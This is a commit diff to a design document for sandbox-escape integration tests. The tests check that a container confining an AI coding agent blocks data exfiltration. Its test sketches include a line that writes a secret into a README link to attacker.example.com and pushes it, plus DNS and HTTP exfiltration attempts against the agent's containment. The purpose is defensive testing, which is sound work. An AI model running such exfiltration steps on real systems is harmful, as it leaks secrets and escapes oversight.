docs(prd-0022): resolve remaining open Qs
test / unit (pull_request) Successful in 18s
test / integration (pull_request) Successful in 1m7s

All seven open questions now have decisions baked in:

  - Q1 (HTTP-exfil scope): authoritative. Every shape MUST
    block; chunk 3 expands into remediation sub-PRDs if
    any of path/query/header leak today.
  - Q3 (fake secret): multiple shapes, parameterized.
    Three env vars (TEST_SECRET_ANTHROPIC, _AWS, _GENERIC);
    test 5 loops via subTest. Resilient to gitleaks rule
    renames.
  - Q6 (missing backend): die. `get_bottle_backend()`'s
    current behavior surfaces clearly; surprise-skips are
    worse than loud failures for new-backend branches.
  - Q7 (tool deps): preflight check. setUpClass runs
    `which curl && which git && which dig`; SkipTest with
    the missing list catches future backends shipping
    thinner base images.

Updated implementation chunks + test-5 sketch to match.
No remaining open questions.
This commit is contained in:
2026-05-26 22:11:32 -04:00
parent 73939861f9
commit 1111ced04d
+128 -110
View File
@@ -136,10 +136,13 @@ destination outside the bottle.
- The bottle declares: a few allowlisted egress routes - The bottle declares: a few allowlisted egress routes
(api.anthropic.com, etc.), a git-gate upstream pointing (api.anthropic.com, etc.), a git-gate upstream pointing
at a throwaway repo, supervise off (not under test) at a throwaway repo, supervise off (not under test)
- Plants a known `TEST_SECRET` value in the bottle's env. - Plants three known secret env vars (matching three
The value matches a gitleaks rule (e.g., shaped like an gitleaks rules — anthropic-api-key, AWS, generic
Anthropic API key) so the README test fires the right high-entropy) so test 5 parameterizes over shapes.
pre-receive rejection. - A `setUpClass` preflight that verifies `curl`, `git`,
`dig` exist in the agent container; raises
`unittest.SkipTest` listing missing tools if any are
absent (catches future backends with thinner images).
- A `_run_in_agent(script)` helper that wraps - A `_run_in_agent(script)` helper that wraps
`bottle.exec(script)` and returns an `ExecResult`. `bottle.exec(script)` and returns an `ExecResult`.
- Assertions per category that read the existing - Assertions per category that read the existing
@@ -303,87 +306,130 @@ def test_4_dns_exfil_blocked(self):
self.assertNotIn("ANSWER SECTION", result.stdout) self.assertNotIn("ANSWER SECTION", result.stdout)
``` ```
### Attack-5: secret in README push (with ordering check) ### Attack-5: secret in README push (multi-shape, with ordering check)
Parameterized over three secret shapes so a renamed
gitleaks rule doesn't silently let one shape through.
```python ```python
SECRET_SHAPES = [
("anthropic", "$TEST_SECRET_ANTHROPIC"),
("aws", "$TEST_SECRET_AWS"),
("generic", "$TEST_SECRET_GENERIC"),
]
def test_5_readme_push_blocked(self): def test_5_readme_push_blocked(self):
result = self.bottle.exec( for name, env_ref in SECRET_SHAPES:
'cd /tmp && git init test-repo && cd test-repo && ' with self.subTest(secret=name):
'git config user.email "test@example.com" && ' result = self.bottle.exec(
'git config user.name "test" && ' 'cd /tmp && rm -rf test-repo && '
'echo "[click](https://attacker.example.com/?leak=$TEST_SECRET)" > README.md && ' 'git init test-repo && cd test-repo && '
'git add . && git commit -m "leak" && ' 'git config user.email "test@example.com" && '
'git remote add origin ' 'git config user.name "test" && '
'git://claude-bottle-git-gate-<slug>/throwaway.git && ' f'echo "[click](https://attacker.example.com/?leak={env_ref})" > README.md && '
'git push origin master' 'git add . && git commit -m "leak" && '
) 'git remote add origin '
self.assertNotEqual(0, result.returncode) 'git://claude-bottle-git-gate-<slug>/throwaway.git && '
combined = (result.stderr + result.stdout).lower() 'git push origin master'
# gitleaks ran and rejected. )
self.assertIn("gitleaks", combined) self.assertNotEqual(0, result.returncode)
# AND: the rejection happened BEFORE git-gate tried to combined = (result.stderr + result.stdout).lower()
# forward to the unreachable upstream. Network errors # gitleaks ran and rejected.
# mentioning resolve / refused / unreachable would mean self.assertIn("gitleaks", combined)
# gitleaks ran AFTER (sequence wrong) or didn't run. # AND: rejection BEFORE the unreachable upstream
for upstream_phrase in ( # was contacted — network-phase errors would
"could not resolve", # mean gitleaks ran late or not at all.
"connection refused", for upstream_phrase in (
"network is unreachable", "could not resolve",
"upstream", "connection refused",
): "network is unreachable",
self.assertNotIn( "upstream",
upstream_phrase, combined, ):
f"unexpected upstream-phase phrase: gitleaks should " self.assertNotIn(
f"reject BEFORE git-gate attempts an upstream push", upstream_phrase, combined,
) f"unexpected upstream-phase phrase for {name!r}: "
f"gitleaks should reject BEFORE git-gate "
f"attempts an upstream push",
)
``` ```
The `<slug>` is templated via the bottle's known identity at The `<slug>` is templated via the bottle's known identity at
fixture-time. The two-part assertion both confirms gitleaks fixture-time. Each subTest independently:
fired AND that it fired before any upstream attempt — the - Confirms the rejection happened (returncode != 0)
ordering the sandbox depends on. - Confirms gitleaks fired (`"gitleaks"` in output)
- Confirms gitleaks fired BEFORE the upstream attempt
(no network-phase phrases in output)
## Implementation chunks ## Implementation chunks
Sized small. Sized small.
1. **Fixture manifest + secret env-var plumbing.** Just the 1. **Fixture + scaffolding.** Files under
files under `tests/integration/fixtures/sandbox-escape/` `tests/integration/fixtures/sandbox-escape/`, the
and the test class scaffolding with `setUpClass` / TestSandboxEscape class with `setUpClass` /
`tearDownClass` bringing up + tearing down the bottle. `tearDownClass`, the three-secret env-var fixture
(anthropic / AWS / generic shapes), and the
`setUpClass` preflight that checks for `curl`, `git`,
`dig` in the agent and SkipTests with the missing list.
No attack tests yet. No attack tests yet.
2. **Attack 1 + 2 (hostname + IP).** The simplest two — 2. **Attack 1 + 2 (hostname + IP).** Curl exit-code
curl returns non-zero, that's the assertion. assertions. Also covers the host-header spoof via
3. **Attack 3 (HTTP exfil shapes).** Parameterized over the `curl --resolve`.
four shapes via subTest. Likely surfaces gaps in current 3. **Attack 3 (HTTP exfil shapes).** Parameterized over
DLP coverage for header / path / query shapes. the four shapes (path, query, body, header) via
4. **Attack 4 (DNS exfil).** Exact-match-allowlist subTest. **This chunk is authoritative** — if any shape
verification. leaks today, the chunk expands to include the
5. **Attack 5 (README push via git-gate).** Hardest because remediation PRD work for that shape before merging.
it requires the git-gate sidecar configured and the May fan out into multiple sub-PRs (one per leaking
gitleaks rule fired. The "throwaway" upstream URL is shape) coordinated as a chunk-3 epic.
intentionally unreachable to keep the test fully 4. **Attack 4 (DNS exfil).** Two sub-assertions:
self-contained. Ordering assertions confirm gitleaks crafted-subdomain-via-pipelock + direct
fires before any upstream push attempt. `dig @8.8.8.8` from the agent's `--internal` network.
5. **Attack 5 (README push via git-gate).** Hardest
because of the multi-secret-shape parameterization +
git-gate-must-be-up requirement + the gitleaks-ordering
assertions. The "throwaway" upstream URL is
intentionally unreachable.
6. **CI integration (best-effort).** Add a Gitea Actions 6. **CI integration (best-effort).** Add a Gitea Actions
job that runs the suite against the Docker backend. job that runs the suite against the Docker backend.
Marked `continue-on-error: true` so the workflow doesn't Marked `continue-on-error: true` so the workflow
fail if docker-in-docker constraints prevent compose-up. doesn't fail if docker-in-docker constraints prevent
If the runner shape evolves later (e.g., privileged compose-up. If the runner shape evolves later
Docker socket access) the suite slots in cleanly. (privileged Docker socket access) the suite slots in
cleanly.
## Resolved questions ## Resolved questions
1. **Pipelock DLP coverage for non-body shapes.** Resolved:
**authoritative.** Every HTTP-exfil shape (path / query /
body / header) MUST block for the suite to pass. If a
shape leaks today, it's a real sandbox gap and the
remediation lands BEFORE this test merges, not after.
The project's purpose is sandbox integrity; shipping a
test that documents "we knowingly leak headers" is
worse than not shipping the test. May expand the
delivery into "this test PRD + N remediation PRDs"
depending on what attack 3 surfaces.
2. **DNS exfil via the agent's direct DNS resolver.** 2. **DNS exfil via the agent's direct DNS resolver.**
Resolved: **add the assertion to test 4.** The Resolved: **add the assertion to test 4.** The
`--internal` network has no default gateway, so a direct `--internal` network has no default gateway, so a direct
`dig @8.8.8.8 <SECRET>.example.com` from the agent `dig @8.8.8.8 <SECRET>.example.com` from the agent
should fail. Test 4 grows a second assertion: in should fail. Test 4 grows a second sub-assertion
addition to the crafted-subdomain-via-pipelock attempt alongside the crafted-subdomain-via-pipelock check.
(which pipelock's exact-match allowlist rejects), the
agent's direct DNS query is also blocked. Both 3. **Realistic fake secret.** Resolved: **multiple
sub-assertions must pass for test 4 to be green. shapes, parameterized.** The README attack (test 5)
loops over a tuple of secret shapes — anthropic-api-key,
AWS key (AKIA...), and a generic high-entropy string —
running the push-attempt N times. Each iteration is a
subTest. Catches the case where one gitleaks rule
lapses but another still fires; also makes the test
resilient to rule renames. The fixture bottle's env
carries `TEST_SECRET_ANTHROPIC` / `TEST_SECRET_AWS` /
`TEST_SECRET_GENERIC` rather than one combined
`TEST_SECRET`.
4. **Reachability of throwaway git upstream + gitleaks 4. **Reachability of throwaway git upstream + gitleaks
ordering.** Resolved: **add ordering assertions to test 5.** ordering.** Resolved: **add ordering assertions to test 5.**
@@ -397,61 +443,33 @@ Sized small.
`"network is unreachable"`, or `"upstream"` — those `"network is unreachable"`, or `"upstream"` — those
would mean gitleaks let the push through and the would mean gitleaks let the push through and the
failure happened later in the chain. failure happened later in the chain.
The second assertion is the "ordering" check — if it
fires, gitleaks ran AFTER the upstream attempt
(sequence is wrong) or didn't run at all.
5. **CI vs. local-only.** Resolved: **attempt CI; accept 5. **CI vs. local-only.** Resolved: **attempt CI; accept
local-only fallback if docker-in-docker blocks it.** local-only fallback if docker-in-docker blocks it.**
The Gitea Actions runner ecosystem usually has Docker Add a Gitea Actions job that runs the suite against the
available to the workflow but not nested Docker Docker backend on a runner with Docker socket access.
compose inside a containerized runner. v1 tries: add a If compose-up fails because of DiD constraints, the
CI job that runs the suite against the Docker backend
on a runner with Docker socket access. If the
compose-up step fails because of DiD constraints, the
job is marked `continue-on-error: true` and the suite job is marked `continue-on-error: true` and the suite
stays local-only until we have a runner shape that can stays local-only until we have a runner shape that can
host it. host it.
## Open questions 6. **Backend-agnostic invocation when backend missing.**
Resolved: **die (current behavior).** `get_bottle_backend()`
already dies with a clear message naming the unknown
backend; the test surfaces that as a hard error
rather than a skip. Forces the developer to set
`CLAUDE_BOTTLE_BACKEND` to a real implementation —
surprise-skips on smolmachines branches that forgot to
set the env var are worse than a loud failure.
1. **What does today's pipelock actually do for shapes 3.1, 7. **Test environment requirements: enforce via preflight.**
3.2, 3.4?** DLP body-scanning is a known feature; URL / Resolved: **preflight check in `setUpClass`.** After
path / header scanning is less clear. The test will tell bringing the bottle up, run `which curl && which git
us — if a shape passes today (attack succeeds), it's a && which dig` inside the agent container; if any tool
real gap and the test fails LOUDLY rather than silently is missing, raise `unittest.SkipTest` with the missing
passing. Either: list. Catches a future backend that ships a thinner
- Treat the test as authoritative: every shape MUST block base image without producing five confusing
for the suite to pass. Failing shapes are real bugs. command-not-found failures down the suite.
- Treat the test as descriptive: mark the failing shapes
`expectedFailure` and resolve them in a follow-up PRD.
Lean toward the first — the project's purpose is sandbox
integrity; documenting "we knowingly leak headers" is
worse than fixing it. But for v1 of this test it's OK to
land with `expectedFailure` markers + tickets.
3. **Realistic fake secret.** `sk-ant-api03-...` shape is
what gitleaks's anthropic-api-key rule matches. Verify
the exact regex before settling on the fixture value;
wrong-shape secret would mean attack 5 silently passes
the wrong way (gitleaks doesn't fire, README ships).
6. **Backend-agnostic invocation.** The suite reads
`CLAUDE_BOTTLE_BACKEND` so it runs against whatever
backend is active. For the smolmachines spike, the
developer sets that env var + runs the same test file.
No code change needed in the suite itself. Worth
verifying the existing `get_bottle_backend()` machinery
handles the backend-not-yet-implemented case gracefully
(it dies with a clear message today — confirm that's
what we want).
7. **Test environment requirements.** The agent container
needs `curl`, `git`, `dig`. Already in today's Docker
image; need to declare these as required for any
future backend's base image too. Worth noting in the
smolmachines PRD.
## References ## References